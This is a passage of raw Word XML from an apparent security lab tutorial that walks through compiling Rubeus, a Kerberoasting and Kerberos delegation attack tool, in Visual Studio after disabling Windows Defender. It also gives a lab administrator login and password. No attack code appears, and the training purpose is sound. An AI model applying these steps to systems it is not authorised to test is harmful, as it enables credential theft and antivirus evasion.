        </w:rPr>
        <w:t>DDer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> that was released with an “MIT-like” license. Huge thanks to Thomas for his clean and stable code! The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KerberosRequestorSecurityToken.GetRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> method for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was contributed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> by @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>machosec.Elad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shamir contribute some essential work for resource-based constrained delegation. @harmj0y is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>primary author of this code base. Rubeus is licensed under the BSD 3-Clause license.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEAA60D" w14:textId="2E2DE00B"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13D14BC">
          <v:shape id="_x0000_i1329" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId48" w:name="DefaultOcxName28" w:shapeid="_x0000_i1329"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To see the power of the tool, refer to the options for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F13610" w14:textId="41DF6B12"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4F5171FF" wp14:editId="1195FB89">
            <wp:extent cx="5400040" cy="4606925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="13054241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06925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B3C8AB" w14:textId="2010EEE7"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028F2DAA">
          <v:shape id="_x0000_i1328" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId50" w:name="DefaultOcxName29" w:shapeid="_x0000_i1328"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We need to compile the code, so we will go over the process involved. Since it is in Windows, we can use the Visual Studio compiler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726458D" w14:textId="49E86153" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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9D7870F">
          <v:shape id="_x0000_i1327" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId51" w:name="DefaultOcxName30" w:shapeid="_x0000_i1327"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Log in to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="00D05942">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0067B8"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>AD Win</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPT\Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> with password </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Pa$$w0rd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22470EC3" w14:textId="7B63063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C651C0C">
          <v:shape id="_x0000_i1326" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId53" w:name="DefaultOcxName31" w:shapeid="_x0000_i1326"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Before we do anything else, disable Windows Defender since it can cause problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E0ED5" w14:textId="40C2A246"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7DF1E1C8">
          <v:shape id="_x0000_i1325" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId54" w:name="DefaultOcxName32" w:shapeid="_x0000_i1325"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Navigate to C:\Users\Administrator.LPT\Downloads\kerberos\Rubeus-master and double-click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rubeus.sln</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> file. An example of the extracted file is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055BB981" w14:textId="67477D14"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436FA560" wp14:editId="20EE0BCD">
            <wp:extent cx="5400040" cy="1771015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="687263389"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1015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE83F37" w14:textId="22582D2F"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2D28271F">
          <v:shape id="_x0000_i1324" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId56" w:name="DefaultOcxName33" w:shapeid="_x0000_i1324"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>How do you want to open this file? pop-up appears, choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Visual Studio 2019</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACDE10C" w14:textId="7D3AEC67"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7871A288" wp14:editId="5E083DE2">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="940324737"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73F4873" w14:textId="4F73FB09"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A75262E">
          <v:shape id="_x0000_i1323" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId58" w:name="DefaultOcxName34" w:shapeid="_x0000_i1323"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click on the arrow </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> button, as shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB3B5F" w14:textId="7C56D797"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3B468668" wp14:editId="08A9FCE0">
            <wp:extent cx="5400040" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="441685844"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71475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB16BF3" w14:textId="1EF6D777"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B9F1980">
          <v:shape id="_x0000_i1322" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId60" w:name="DefaultOcxName35" w:shapeid="_x0000_i1322"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sign in</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Create one</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D872B35" w14:textId="40ADFD11"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41A2158C" wp14:editId="516C3EB1">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="149859165"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591799A" w14:textId="0D324587"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022171BB">
          <v:shape id="_x0000_i1321" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId62" w:name="DefaultOcxName36" w:shapeid="_x0000_i1321"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sign in to your account pop-up appears, provide the login details and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sign in</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F2F1C4" w14:textId="60F6FBFA"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5814CC8D" wp14:editId="5C6D1CCE">
            <wp:extent cx="5391150" cy="6005195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1356061445"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6005195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B31F0D4" w14:textId="6A94CE02"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0F83137">
          <v:shape id="_x0000_i1320" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId64" w:name="DefaultOcxName37" w:shapeid="_x0000_i1320"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once you are logged into Visual Studio, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0BBF9" w14:textId="751843E3"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3C84DC5A" wp14:editId="76FA22DC">
            <wp:extent cx="5400040" cy="3879215"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="61956755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879215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6819D2" w14:textId="15E801C8"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0064C93">
          <v:shape id="_x0000_i1319" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId66" w:name="DefaultOcxName38" w:shapeid="_x0000_i1319"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>You would expect the code to compile, but Windows Defender will block it. Disable Windows Defender and try again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B36960" w14:textId="31B75668"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CB4821D">
          <v:shape id="_x0000_i1318" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId67" w:name="DefaultOcxName39" w:shapeid="_x0000_i1318"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>You should now be successful, as shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE6AC7" w14:textId="15DA5DC0"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53F05CCA" wp14:editId="7819EE5D">
            <wp:extent cx="5400040" cy="569595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="45571408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569595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B34B82" w14:textId="1CC454A4"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7248B72">
          <v:shape id="_x0000_i1317" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId69" w:name="DefaultOcxName40" w:shapeid="_x0000_i1317"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now that we have finally compiled it, let us see if it is successful. The executable is located in the debug folder. The full path is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04646D68" w14:textId="6C7228BA"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60067AFD" wp14:editId="5765837D">
            <wp:extent cx="5400040" cy="1188720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14637444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1188720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5E495" w14:textId="13FBA49B"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3A92F4C">
          <v:shape id="_x0000_i1316" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId71" w:name="DefaultOcxName41" w:shapeid="_x0000_i1316"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
